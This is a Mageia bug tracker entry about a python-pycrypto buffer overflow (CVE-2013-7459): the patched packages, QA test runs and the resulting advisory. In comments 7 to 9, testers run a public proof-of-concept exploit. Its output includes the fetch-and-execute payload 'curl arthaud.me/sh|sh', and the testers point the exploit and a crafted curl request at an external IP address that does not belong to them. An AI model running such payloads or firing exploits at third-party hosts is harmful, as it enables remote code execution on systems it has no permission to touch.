Bug 20031 - python-pycrypto new security issue CVE-2013-7459
Summary: python-pycrypto new security issue CVE-2013-7459
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 5
Hardware: All Linux
Priority: Normal normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: https://lwn.net/Vulnerabilities/710478/
Whiteboard: MGA5-64-OK MGA5-32-OK advisory
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2016-12-27 19:34 CET by David Walser
Modified: 2017-02-02 09:12 CET (History)
4 users (show)

See Also:
Source RPM: python-pycrypto-2.6.1-8.mga6.src.rpm
CVE: CVE-2013-7459
Status comment:


Attachments
Random output test for python[3]-pycrypto (821 bytes, text/plain)
2017-01-08 15:00 CET, Lewis Smith
Details
POC for this bug, Python script to get a remote shell. (873 bytes, text/plain)
2017-01-08 15:17 CET, Lewis Smith
Details

Description David Walser 2016-12-27 19:34:34 CET
A CVE has been assigned for a security issue fixed upstream in python-pycrypto:
http://openwall.com/lists/oss-security/2016/12/27/8

The upstream commit to fix the issue is linked in the message above.  It sounds like it's non-trivial to backport to 2.6.1.  It also sounds like a serious issue.

Mageia 5 is also affected.
David Walser 2016-12-27 19:34:44 CET

Whiteboard: (none) => MGA5TOO

Comment 1 Philippe Makowski 2016-12-28 14:19:45 CET
python-pycrypto-2.6.1-6.1.mga5
python3-pycrypto-2.6.1-6.1.mga5

from python-pycrypto-2.6.1-6.1.mga5.src.rpm
are in 5/core/updates_testing

This is a security fix for a possible Buffer overflow

ref :
http://openwall.com/lists/oss-security/2016/12/27/8
https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4
https://marc.info/?l=oss-security&m=148280482630855&w=2


Cauldron is also patched 
rpm have it own test suite run during the build, including for this issue.

Whiteboard: MGA5TOO => (none)
CVE: (none) => CVE-2013-7459
Assignee: makowski.mageia => qa-bugs
Version: Cauldron => 5

David Walser 2017-01-03 20:34:16 CET

URL: (none) => https://lwn.net/Vulnerabilities/710478/

Comment 2 Lewis Smith 2017-01-08 14:55:04 CET
Prior to testing.
The most recent python-pycrypto bug:
 https://bugs.mageia.org/show_bug.cgi?id=11491#c0
has some code for *that* problem which I shall attach here simply because it uses the same package. The output (after that old update) should be random.

 https://marc.info/?l=oss-security&m=148280482630855&w=2
is a fantastically detailed & precise analysis of the bug, with a code exploit which I also will attach here. More 'for the record', since it concludes:
"After a few hours, I finally got a shell!"

CC: (none) => lewyssmith

Comment 3 Lewis Smith 2017-01-08 15:00:23 CET
Created attachment 8841 [details]
Random output test for python[3]-pycrypto

From bug 11491, this is just a little python script which uses the python-pycrypto package. The 4 lines of output should be random.
 $ python[3] cryptoRandom.py
Comment 4 Lewis Smith 2017-01-08 15:17:40 CET
Created attachment 8842 [details]
POC for this bug, Python script to get a remote shell.

From https://marc.info/?l=oss-security&m=148280482630855&w=2 for info only.
Written for Python3; may work for earlier.
Expect it to run for hours before (pre-update only) giving a shell.
Comment 5 Lewis Smith 2017-01-08 15:29:55 CET
Testing M5_64

BEFORE update:
 python-pycrypto-2.6.1-6.mga5
 python3-pycrypto-2.6.1-6.mga5
$ python cryptoRandom.py 
[u'11ebfa07b917df5b,1643424639ad0df8',
 u'1c75461b81e3808f,7476bd90682ace47',
 u'3de101081f86ac97,514d5e1c4abb325e',
 u'c62efc43f35b0b0b,14799ad508334985']
$ python3 cryptoRandom.py
[similar sort of O/P]

AFTER update:
 python-pycrypto-2.6.1-6.1.mga5
 python3-pycrypto-2.6.1-6.1.mga5
$ python cryptoRandom.py
[similar sort of correct O/P as previously]
$ python3 cryptoRandom.py
[similar sort of correct O/P as previously]

So the package still works although its long POC not specifically tested.
From Comment 1 "rpm have it own test suite run during the build, including for this issue." OK.

Whiteboard: (none) => MGA5-64-OK

Comment 6 Lewis Smith 2017-01-08 20:49:27 CET
Advisory created from Comment 1, title, the references.

Whiteboard: MGA5-64-OK => MGA5-64-OK advisory

Comment 7 Len Lawrence 2017-02-01 18:34:08 CET
Testing on i586 virtualbox.
Thanks for the upload Lewis.

Before updating:
$ python cryptoRandom.py 
[u'42364207b0dce3c2,29364e940c3c17c9',
 u'50a9812b90741463,3035440668d34d67',
 u'e8bfa75fdf36ad24,d2678147321a44a6',
 u'f2480379ff1dddac,64aba216bbe90636']
$ python3 cryptoRandom.py
['050e5d799b3ab7c8,26529743331d7995',
 '1d1bfaea7011db37,63d5549433c22325',
 '86c19227a42ef910,88527138e99cfe25',
 'a5a45316ae36ed16,9197abb3d58ed85b']

Running 'python getShell.py' fails on a syntax error.
Noting that the original was written for python3 I tried

$ python3 getShell.py

The systax was accepted but the terminal filled with hundreds of echoes of the 'curl arthaud.me/sh|sh' command and ended on a connection failure:
curl%20arthaud.me%2fsh%7csh%00%00%00%d6%80%15%08 (Caused by ProtocolError('Connection aborted.', ConnectionRefusedError(111, 'Connection refused')))

I wonder if the address targeted needs to be changed to something accessible.  No clue really.
$ dig 136.243.194.56
did not provide any useful information.
$ nslookup 136.243.194.56
Server:		192.168.1.1
Address:	192.168.1.1#53

Non-authoritative answer:
56.194.243.136.in-addr.arpa	name = ip-136-243-194-56.bb.netbynets.de.

Maybe a German broadband provider?

Worth trying after the update though.

CC: (none) => tarazed25

Comment 8 Len Lawrence 2017-02-01 18:48:01 CET
After the update the functionality test worked fine as before, with python and python3.

The PoC test with python3 behaved just as before with a final "Connection refused".
Should the attempt to get a remote shell have been thwarted immediately if the 
fix had worked?  I defer to a higher authority.
Comment 9 Len Lawrence 2017-02-01 18:57:13 CET
Also tried this:
$ curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg=AAAAAAAAAAAAAAAA&keyAAAAAAAAAAAAAAAA&mode=42&iv=AAAAAAAAAAAAAAAA"        curl: (7) Failed to connect to 136.243.194.56 port 8000: Connection refused
Comment 10 Philippe Makowski 2017-02-01 21:43:51 CET
(In reply to Len Lawrence from comment #8)
> After the update the functionality test worked fine as before, with python
> and python3.

so you can validate

> The PoC test with python3 behaved just as before with a final "Connection
> refused".
> Should the attempt to get a remote shell have been thwarted immediately if
> the 
> fix had worked?  I defer to a higher authority.
the security issue is tested during the rpm build.

CC: (none) => makowski.mageia

Comment 11 Len Lawrence 2017-02-01 21:52:06 CET
Tanks Philippe.  letting it go then.
Len Lawrence 2017-02-01 21:52:39 CET

Keywords: (none) => validated_update
Whiteboard: MGA5-64-OK advisory => MGA5-64-OK MGA5-32-OK advisory
CC: (none) => sysadmin-bugs

Comment 12 Mageia Robot 2017-02-02 09:12:32 CET
An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2017-0032.html

Resolution: (none) => FIXED
Status: NEW => RESOLVED


Note You need to log in before you can comment on or make changes to this bug.